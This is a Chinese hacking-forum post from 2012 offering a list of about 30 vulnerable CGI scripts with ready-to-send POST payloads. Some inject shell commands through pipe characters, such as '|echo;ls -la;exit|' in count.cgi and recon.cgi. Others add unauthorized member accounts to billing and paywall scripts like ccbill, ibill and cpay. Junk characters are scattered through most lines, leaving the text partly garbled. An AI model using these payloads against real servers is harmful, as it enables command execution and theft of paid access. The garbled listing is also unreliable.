找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3014|回复: 0
打印 上一主题 下一主题

Cgi-bin 30个漏洞+使用方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:55:26 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
==============================
3 a" A/ R$ m1 W9 x
7 }- x  o. a$ z& L/smspass.pl
! r* |6 y" s! z$ q3 Q! vusername=username&password=password  N& H6 S( b+ @, e# W, B: E

) U( l9 V  o) F, D/index.cgi
! F& p! @) g3 C2 B  o; Vwei=ren&gen=command6 A4 |: x: D+ k0 P
+ v* i. c6 d$ A0 i& h
/passmaster.cgi& m" l4 x: b  h8 j" j$ o) a
Action=Add&Username=Username&Password=Password
9 _7 C3 F3 f+ A1 r# l0 \( n7 |- ^$ B' m: L# }2 l$ I
/accountcreate.cgi
; E6 x  r/ x+ Z5 L, ?% Z- uusername=username&password=password&ref1=|echo;ls|5 F3 P! p; |+ c* f% w6 t0 B. c
; F1 k5 I( X. Z+ n& n$ `8 k
/form.cgi
6 N" F0 j& ?4 ~# Wname=xxxx&email=email&subject=xxxx&response=|echo;ls|- R7 p% N' y3 G/ G  V

9 b/ k$ g4 Q3 w2 ~/addusr.pl
" I) u8 u# R- `% j4 W/cgi-bin/EuroDebit/addusr.pl1 i3 `# a0 k+ H6 }8 `6 G. P& O
user=username&pass=Password&confirm=Password
" |! s, a( g, m0 r3 V, B$ H" G4 [2 Y
/ccbill-local.asp
9 q  A( m" p9 t+ u- {post_values=username:password
) B$ @+ p6 z0 M1 |4 @/ P
- h" r6 z$ v2 S& \: F+ R7 R/count.cgi
! P* s$ ?5 a" N( rpinfile=|echo;ls -la;exit|
7 B4 P3 M7 u8 G3 f* @+ O! L0 k3 M
/recon.cgi( C9 x" m0 Y% m, P
/recon.cgi?search. o2 X* z9 I" T1 i5 Y+ _7 r
searchoption=1&searchfor=|echo;ls -al;exit|. D4 b5 H- a3 w* I

  g; _8 w' N! O& }6 g/verotelrum.pl3 A/ p' y) F. F( d# t+ O/ W! O
vercode=username:password:dseegsow:add:amount<&30># }6 L0 [( B4 h6 e9 S
9 Y$ X' o" u0 D- F4 V# ]) O5 Y
/af.cgi
8 k/ }7 z; h9 A: W2 ?_browser_out=|echo;ls -la;exit;|
! }9 x. m& \) b- S  x0 t. A' r6 H  F0 X+ K8 ?% A  a' K2 n# z
/modify.cgi
+ _1 j6 o6 s% p0 \$ nusername=username&password=password&expire=309 E& T4 S/ h4 }/ {) R; e2 v5 v
8 X) ?0 t7 l, b" B3 E$ a& W
/openjournal.cgi
0 G* v  x% V9 V/ M4 ?! d) I+ T5 vedit=1&ct=2&go=|echo;ls -al;exit|0 u$ @7 l, L4 y, Z' ^$ a
2 p; V1 B0 _9 X4 ?2 h
/gx9passwd.cgi
! W) h$ J: E& E. j  {3 Dcmd=ADD&user=username&pass=password5 u8 U. m& P) ]% m2 U  A

5 B5 @0 T2 j- e; t& w. W' s/probecontrol.cgi, G* y0 ?9 A: U1 C0 o% ?  W+ C
command=enable&username=username&password=password
8 U- A( w6 Y7 Z+ f" C# F1 q" Y( ^1 N+ M+ C$ ]# g( `& J" _* t
/recon.cgi
3 z* n8 v7 h; c/ H; ]searchoption=3&searchfor=echo;ls -la;exit
5 Y1 p" _. O" B: w, g1 I7 s* O1 e/ U
! N2 c8 N# y/ ^; A8 R/htadd.pl1 g9 Z/ g1 _: S/ X1 ^/ a
configfile=|echo; ls -alt; exit, w+ l- z. _. K

6 {9 V, V3 L4 ?" C, s3 N, F/gx9passwd.cgi' g- B4 |) J- D& _' P2 W3 K
cmd=ADD&user=username&pass=password
( ]5 n1 a) K) P* C, s- g, ~& L, b! z5 B7 c3 N; G+ Y& R7 t
/ibill*.pl
4 ?, X9 e( R2 P3 h- h1 F; I5 Ureqtype=add&authpwd=authpwd&username=username&password=password
! C$ \8 L7 u% _% S. K( h% q  n; e5 j& a  \7 E, d9 C9 k* E
/cpay.cgi% U0 ^+ E3 [' `( c1 ^- D# g9 \
command=add_member&username=username(EMAIL)&password=password(DES)
8 z, u' G! I4 q7 u, A2 c5 z8 z) h- ]. U' r+ M" Z* l
/globill_ut.cgi. m0 |2 b. N3 V  U
do=add&username=username&password=password&wpassword=password. d; Q) x: X& C0 M/ A
; i1 _2 n- p& q! R- {: r
/usercontrol.cgi
& W- v6 j9 G0 _( U" \command=enable&username=USER&password=PASS% V# z; d( T8 T* |& G
! d: b! @2 f! N+ M3 C0 Y
/globoSALErum.cgi  a, e. S5 p0 Q% `- G; J
action=ADD&seccode=seccode&login=username&password=password9 b4 K+ @% N1 Z% Y
* [' E2 C3 O& f, P; m
/addusr.pl9 P) v, z- c" `
user=USER&pass=PASS&confirm=PASS
1 D- O' G( L& a, a+ n2 v( R3 f, [% |7 R
/pincount.cgi2 k1 s7 I" A, p' V5 ]" `9 ^
/cgi-bin/mastergate/pincount.cgi
5 X5 Z6 j. v# ^3 Q) dpinfile=|echo;pwd;exit|! h) Z$ _* ~1 `; c7 J& a
8 M1 E5 _/ Q5 t; _# T/ I
/accountcreate.cgi
6 v0 O- d7 A  ]/cgi-bin/gateway/accountcreate.cgi, B0 Y/ h( q' C6 n* \& Z
username=username&password=password&password2=password&ref1=|echo;ls -al;exit! ~: O0 s1 r, Q0 g- V) a) ]7 S! \
( D  w0 Z4 x" N* T
/af.cgi& k# R: P' k- ^! p) r3 q
/env.cgi
* A% n3 [/ D9 I% k$ J) AADD+;echo;pwd;exit
$ q+ G, F% y( E& I6 D3 R. H6 I
/count.cgi
! n. r7 `: c; Hpinfile=|echo;pwd;exit|
0 G: h6 a! b! B& R9 B% s' E% z% |9 y( U  K0 K
/recon.cgi; Z# O( a2 F$ \+ l6 ?7 E
searchoption=1&searchfor=|echo;ls%20-al;exit|9 C+ j5 G0 a' c! [* @
: Q& X6 y+ u! k9 ?5 W4 t
/add.cgi) M0 ?, [: Z. |  n+ y
username=username&password=password&expire=300 v2 k; g5 a$ J
: x0 A; k" r6 i% R
==============================
  e6 ^6 ?3 p- q- D
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表